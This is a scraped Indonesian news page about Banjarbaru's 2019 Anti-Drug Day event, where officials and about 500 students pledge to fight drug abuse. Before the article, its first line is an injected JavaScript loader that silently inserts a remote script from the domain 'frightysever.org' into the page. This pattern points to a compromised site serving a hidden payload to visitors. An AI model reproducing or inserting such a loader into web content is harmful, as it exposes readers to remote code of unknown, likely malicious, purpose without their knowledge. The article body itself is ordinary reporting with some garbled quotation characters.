(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
BANJARBARU, Puncak peringatan Hari Anti Narkoba Internasional (HANI) 2019 digelar BNNK Banjarbaru diikuti saat ratusan pelajar dan mahasiswa menampilkan kreatifitas berkeseniaan, Minggu (7/7).
BNNK Banjarbaru bersama pelajar dan mahasiswa alias kaum milenial berkomitmen memerangi penyalahgunaan dan peredaran gelap narkoba.
Dengan talentanya kaum milenial ini menunjukkan kebolehan kreatifitas mereka dengan cara menari, bernyanyi dan bermain musik hingga senam pagi, di GOR Rudy Resnawan.
Selain kegiatan kreatifitas, juga dilakukan penandatangan komitmen bersama memerangi penyalahgunaan dan peredaran gelap narkoba.
Walikota Banjarbaru, H Nadjmi Adhani bersama Kepala BNNK Banjarbaru, AKBP Sugito serta tokoh lainnya yang juga turut hadir.
Dikatakan, Kepala BNNK Banjarbaru AKBP Sugito, pada puncak HANI 2019 tersebut pihaknya mengundang 500 kaum milenial. Ia menjelaskan nantinya usai peringatan HANI, pihaknya akan melaksanakan deteksi dini di instansi Pemko maupun sekolah.
“Kita mewujudkan Kota Banjarbaru yang berkarakter. Kota ini merupakan pusat perkotaan dimana semua tempat hiburan, komunitas, kuliner ada. Jadi tidak menutup kemungkinan adanya peredaran narkoba,†katanya.
Saat ini dikatakannya bahwa kaum milenial menjadi segmen yang menjadi fokus perhatian BNN. Sehingga pihaknya sengaja mendatangkan para siswa baik dari SMP, SMA dan mahasiswa untuk mengenalkan kegiatan yang anti terhadap narkoba.
Walikota Banjarbaru Nadjmi Adhani mengatakan, semua pihak harus mempersiapkan generasi yang nantinya menyambung pengelolaan pemerintahan.
“Generasi yang disiapkan adalah milenial, yakni mereka yang berumur antara 18 sampai 39 tahun,†lanjutnya.
Untuk itu, generasi milenial yang nantinya akan mewujudkan dan memimpin Indonesia emas, menurutnya harus bisa membentengi diri dari penyalahgunaan narkoba. Pemko Banjarbaru dan BNNK Banjarbaru berkomitman untuk selalu bersinergi guna memberantas peredaran dan penyalahgunaan narkoba di Banjarbaru. (rico)
KANALKALIMANTAN.COM, KUALA KAPUAS - Wakil Bupati Kapuas Dodo turun langsung ke pasar besar Kuala Kapuas… Read More
KANALKALIMANTAN.COM, KUALA KAPUAS - Bupati Kapuas H Muhammad Wiyatno melantik 33 Penjabat (Pj) Kepala Desa… Read More
KANALKALIMANTAN.COM, KUALA KAPUAS - Pemerintah Kabupaten Kapuas menggelar forum konsultasi publik penyelenggaraan Mal Pelayanan Publik… Read More
KANALKALIMANTAN.COM, KUALA KAPUAS - Bupati Kapuas H Muhammad Wiyatno melantik 33 orang Penjabat (Pj) Kepala… Read More
Gubernur Kalsel: Percuma Rencana Kalau Tidak Dilakukan Read More
KANALKALIMANTAN.COM, JAKARTA – Keberhasilan Pemerintah Kabupaten Banjar dalam upaya mewujudkan tata kelola pemerintahan yang bersih… Read More
This website uses cookies.